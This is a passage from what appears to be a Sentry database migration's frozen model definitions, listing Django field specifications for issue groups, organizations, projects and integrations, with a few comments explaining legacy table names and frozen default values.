'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'short_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.Team']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
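        # The db_table "'sentry_groupasignee'" above preserves what appears to
        # be a historical misspelling of "assignee"; the live table really is
        # named that, so it must not be "corrected" here without a rename
        # migration.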
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupcommitresolution': {
'Meta': {'unique_together': "(('group_id', 'commit_id'),)", 'object_name': 'GroupCommitResolution'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.groupenvironment': {
'Meta': {'unique_together': "[('group_id', 'environment_id')]", 'object_name': 'GroupEnvironment', 'index_together': "[('environment_id', 'first_release_id')]"},
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'first_release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'group_tombstone_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'state': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouplink': {
'Meta': {'unique_together': "(('group_id', 'linked_type', 'linked_id'),)", 'object_name': 'GroupLink'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'linked_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'linked_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'relationship': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '2'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {'object_name': 'GroupRedirect'},
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'unique': 'True'})
},
'sentry.grouprelease': {
'Meta': {'unique_together': "(('group_id', 'release_id', 'environment'),)", 'object_name': 'GroupRelease'},
'environment': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.groupresolution': {
'Meta': {'object_name': 'GroupResolution'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.groupshare': {
'Meta': {'object_name': 'GroupShare'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'13d0e9633db64057bfa89592c15f547f'", 'unique': 'True', 'max_length': '32'})
},
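        # As with Broadcast.date_expires above, the uuid default
        # "'13d0e9633db64057bfa89592c15f547f'" is a one-off value captured when
        # the migration was generated (the model presumably uses uuid4().hex);
        # it is never applied to new rows at runtime.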
'sentry.groupsnooze': {
'Meta': {'object_name': 'GroupSnooze'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'state': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'user_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.groupsubscription': {
'Meta': {'unique_together': "(('group', 'user'),)", 'object_name': 'GroupSubscription'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'subscription_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'subscription_set'", 'to': "orm['sentry.Project']"}),
'reason': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project_id', 'group_id', 'key'),)", 'object_name': 'GroupTagKey'},
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('group_id', 'key', 'value'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'", 'index_together': "(('project_id', 'key', 'value', 'last_seen'),)"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
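        # Meta options such as unique_together, index_together and db_table are
        # likewise stored as strings containing the repr of the original
        # values; South evaluates them when reconstructing the model state.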
'sentry.grouptombstone': {
'Meta': {'object_name': 'GroupTombstone'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'unique': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.identity': {
'Meta': {'unique_together': "(('idp', 'external_id'),)", 'object_name': 'Identity'},
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'idp': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.IdentityProvider']"}),
'scopes': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.identityprovider': {
'Meta': {'unique_together': "(('type', 'organization'),)", 'object_name': 'IdentityProvider'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.integration': {
'Meta': {'unique_together': "(('provider', 'external_id'),)", 'object_name': 'Integration'},
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'metadata': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationIntegration']", 'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectIntegration']", 'to': "orm['sentry.Project']"}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.latestrelease': {
'Meta': {'unique_together': "(('repository_id', 'environment_id'),)", 'object_name': 'LatestRelease'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'deploy_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationavatar': {
'Meta': {'object_name': 'OrganizationAvatar'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'avatar'", 'unique': 'True', 'to': "orm['sentry.Organization']"})
},
'sentry.organizationintegration': {
'Meta': {'unique_together': "(('organization', 'integration'),)", 'object_name': 'OrganizationIntegration'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'default_auth_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'"},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationonboardingtask': {
'Meta': {'unique_together': "(('organization', 'task'),)", 'object_name': 'OrganizationOnboardingTask'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.organizationoption': {
'Meta': {'unique_together': "(('organization', 'key'),)", 'object_name': 'OrganizationOption', 'db_table': "'sentry_organizationoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.processingissue': {
'Meta': {'unique_together': "(('project', 'checksum', 'type'),)", 'object_name': 'ProcessingIssue'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'sentry.project': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'forced_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'teams'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectTeam']", 'to': "orm['sentry.Team']"})
},
'sentry.projectbookmark': {
'Meta': {'unique_together': "(('project_id', 'user'),)", 'object_name': 'ProjectBookmark'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.projectdsymfile': {
'Meta': {'unique_together': "(('project', 'uuid'),)", 'object_name': 'ProjectDSymFile'},
'cpu_name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'sentry.projectintegration': {
'Meta': {'unique_together': "(('project', 'integration'),)", 'object_name': 'ProjectIntegration'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'rate_limit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'rate_limit_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
